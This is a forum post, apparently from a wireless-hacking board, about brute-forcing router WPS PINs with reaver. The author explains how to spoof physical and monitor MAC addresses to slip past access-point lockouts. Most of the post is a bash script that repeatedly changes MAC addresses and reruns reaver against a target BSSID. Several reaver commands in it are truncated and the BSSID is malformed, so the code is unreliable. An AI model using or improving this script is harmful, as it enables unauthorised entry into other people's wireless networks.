Originally Posted by mmusket33
TO: MMUSKET 33
Thank you for bringing this to my attention!
I have made my script without focusing on a small this piece of information in the mac spoofing area in the reaver help section.The reaver program is behaves somewhat
different i suppose
A BETTER UNDERSTANDING WHY REAVER BEHAVES DIFFRENTLY WHEN ONLY VIRTUAL MAC ADDRESS INTERFACE IS CHANGED
I observed that my script ran the reaver program "ok" meaning that it " SOMETIMES" sucessfully attempted pins. however, frequently
the reaver program get stuck at the "Sending identity response", I believe that changing the virtual interface of mon0 SOMETIMES affects "diffie-hellman" secret numbers
process which takes place at message 1 and 2 to agree on a common opened shared key before requesting the first pin. A couple of Access points
refused to send message 1 because of this.....Nevertheless instead of using the ifconfig utility to change my physical mac. I
have used the macchanger utility to change my physical interface and my virtual interface which reaver use.
I ran reaver without using the -m flag (since i have already used macchanger to change my mac instead of giving reaver this option)and
it successfully completed that diffie-hellman stage (message 1 and 2)!
REVISED SCRIPT
i have modified my script to change my physical and virtual interface to specific defined mac address.
My script is now a little lengthy and it changes my mac address once after a pin is tried for 11 times and after that the script
restarts itself(I am still reading a book on bash scripting so i supposed once i finised this book i will find a way to reduce this script length.
YOUR OPONION
What is your opinion on the new measures enacted for wps security?. I have tried my revised script and it seems that changing my mac address
at every pin attempt have no effect on the new cisco routers!. these router exponentially relates pin attempts with its wps locking feature..I observed that the more bad pin attempts tried the router locks up for longer period of time!.Also i am assessing another router that request both half of the pins at once which makes reaver believes that message 5 recieved means that the first half of the pin is correct!.
I did some searching on the web and found that this is a new measure for wps 2.0 version.seems like this sweet little program, reaver, was
taken seriously..haha..
however my revised script is below
#!/bin/bash
#Changing Mac Address to random Mac Address
while :; do echo
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 88:51:e4:b8:d6:51 mon0;
printf "changing mac address of wlan1 interface\n";
sleep 3;
macchanger -m 88:51:e4:b8:d6:51 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4"\n;
echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
sleep 2;
#SECOND TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4"\n;
echo y|reaver -i mon0 -b C8
sleep 2;
#THIRD TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m aa:6d:9b:58:f0:83 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m aa:6d:9b:58:f0:83 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4"\n;
echo y|reaver -i mon0 -b C8
sleep 2;
#THIRD TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
sleep 3;
macchanger -m 9a:92:2f:79:69:f1 mon0;
printf "changing mac address of wlan1 interface\n";
macchanger -m 9a:92:2f:79:69:f1 wlan1;
ifconfig mon0 up;
printf "Mac Address Changed and interface is up!\n";
sleep 3;
#running reaver 1.4
printf "running reaver 1.4"\n;
echo y|reaver -i mon0 -b C8
sleep 2;
#FOUR TIME
#Changing Mac Address to random Mac Address
printf "Changing Mac Address to random Mac Address\n";
sleep 3;
printf "bringing down wlan1\n";
sleep 3;
ifconfig wlan1 down;
ifconfig wlan1 down;
printf "bringing down mon0\n";
ifconfig mon0 down;
ifconfig mon0 down;
printf "changing mac address of mon0 interface\n";
printf "changing mac address of wlan1 interface\n";
sleep 3;
### THIS PROCESS GOES UNTIL UNTIL 11 ATTEMPS AND RESTARTS
